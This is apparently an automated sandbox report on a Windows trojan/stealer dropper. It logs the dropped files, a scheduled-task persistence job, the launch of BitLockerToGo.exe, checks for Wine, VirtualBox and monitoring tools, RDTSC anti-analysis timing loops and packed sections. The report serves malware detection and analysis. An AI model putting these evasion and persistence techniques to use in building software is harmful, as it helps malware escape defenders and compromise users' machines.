Source: 00000008.00000002.2577492519.000000000A010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: dFVyelEPsf.exe Static PE information: Section: ypmcudir ZLIB complexity 0.9944701547105911
Source: skotes.exe.0.dr Static PE information: Section: ypmcudir ZLIB complexity 0.9944701547105911
Source: random[1].exe0.6.dr Static PE information: Section: ZLIB complexity 0.996481948757764
Source: random[1].exe0.6.dr Static PE information: Section: voasjcay ZLIB complexity 0.9950232086820083
Source: 8dcfe9a593.exe.6.dr Static PE information: Section: ZLIB complexity 0.996481948757764
Source: 8dcfe9a593.exe.6.dr Static PE information: Section: voasjcay ZLIB complexity 0.9950232086820083
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/7@10/3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00684990 CoCreateInstance, 10_2_00684990
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\dFVyelEPsf.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: dFVyelEPsf.exe Virustotal: Detection: 61%
Source: dFVyelEPsf.exe ReversingLabs: Detection: 64%
Source: dFVyelEPsf.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\dFVyelEPsf.exe File read: C:\Users\user\Desktop\dFVyelEPsf.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\dFVyelEPsf.exe "C:\Users\user\Desktop\dFVyelEPsf.exe"
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe "C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe"
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe "C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: dFVyelEPsf.exe Static file information: File size 2104832 > 1048576
Source: dFVyelEPsf.exe Static PE information: Raw size of ypmcudir is bigger than: 0x100000 < 0x196000
Source: Binary string: BitLockerToGo.pdb source: bd03a8025c.exe, 00000008.00000002.2577492519.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: bd03a8025c.exe, 00000008.00000002.2577492519.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Unpacked PE file: 0.2.dFVyelEPsf.exe.cf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ypmcudir:EW;otuzezff:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ypmcudir:EW;otuzezff:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.b90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ypmcudir:EW;otuzezff:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ypmcudir:EW;otuzezff:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.b90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ypmcudir:EW;otuzezff:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ypmcudir:EW;otuzezff:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: dFVyelEPsf.exe Static PE information: real checksum: 0x20e830 should be: 0x20a7fa
Source: 8dcfe9a593.exe.6.dr Static PE information: real checksum: 0x21288c should be: 0x8dce6
Source: skotes.exe.0.dr Static PE information: real checksum: 0x20e830 should be: 0x20a7fa
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x21288c should be: 0x8dce6
PE file contains sections with non-standard names
Source: dFVyelEPsf.exe Static PE information: section name:
Source: dFVyelEPsf.exe Static PE information: section name: .idata
Source: dFVyelEPsf.exe Static PE information: section name:
Source: dFVyelEPsf.exe Static PE information: section name: ypmcudir
Source: dFVyelEPsf.exe Static PE information: section name: otuzezff
Source: dFVyelEPsf.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: ypmcudir
Source: skotes.exe.0.dr Static PE information: section name: otuzezff
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name: .symtab
Source: bd03a8025c.exe.6.dr Static PE information: section name: .symtab
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: voasjcay
Source: random[1].exe0.6.dr Static PE information: section name: mgtkptwk
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: 8dcfe9a593.exe.6.dr Static PE information: section name:
Source: 8dcfe9a593.exe.6.dr Static PE information: section name: .idata
Source: 8dcfe9a593.exe.6.dr Static PE information: section name:
Source: 8dcfe9a593.exe.6.dr Static PE information: section name: voasjcay
Source: 8dcfe9a593.exe.6.dr Static PE information: section name: mgtkptwk
Source: 8dcfe9a593.exe.6.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00BAD91C push ecx; ret 6_2_00BAD92F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 10_2_00692240 push eax; mov dword ptr [esp], 929D9C6Fh 10_2_00692244
Source: dFVyelEPsf.exe Static PE information: section name: entropy: 7.055821286060536
Source: dFVyelEPsf.exe Static PE information: section name: ypmcudir entropy: 7.953188969865273
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.055821286060536
Source: skotes.exe.0.dr Static PE information: section name: ypmcudir entropy: 7.953188969865273
Source: random[1].exe0.6.dr Static PE information: section name: entropy: 7.940912998585798
Source: random[1].exe0.6.dr Static PE information: section name: voasjcay entropy: 7.9437675744962855
Source: 8dcfe9a593.exe.6.dr Static PE information: section name: entropy: 7.940912998585798
Source: 8dcfe9a593.exe.6.dr Static PE information: section name: voasjcay entropy: 7.9437675744962855
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1075542001\8dcfe9a593.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\dFVyelEPsf.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\dFVyelEPsf.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075538001\bd03a8025c.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\dFVyelEPsf.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EB43D5 second address: EB43DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EB43DD second address: EB43EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FA521013236h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: ECAAD5 second address: ECAADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: ECAC04 second address: ECAC08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: ECAC08 second address: ECAC29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA52075DA56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jbe 00007FA52075DA56h 0x00000015 push eax 0x00000016 pop eax 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: ECAC29 second address: ECAC2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: ECAD56 second address: ECAD77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA52075DA69h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: ECAD77 second address: ECAD7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: ECAD7C second address: ECAD82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: ECAD82 second address: ECAD9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA52101323Bh 0x0000000f jnp 00007FA521013236h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: ECAD9D second address: ECADA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
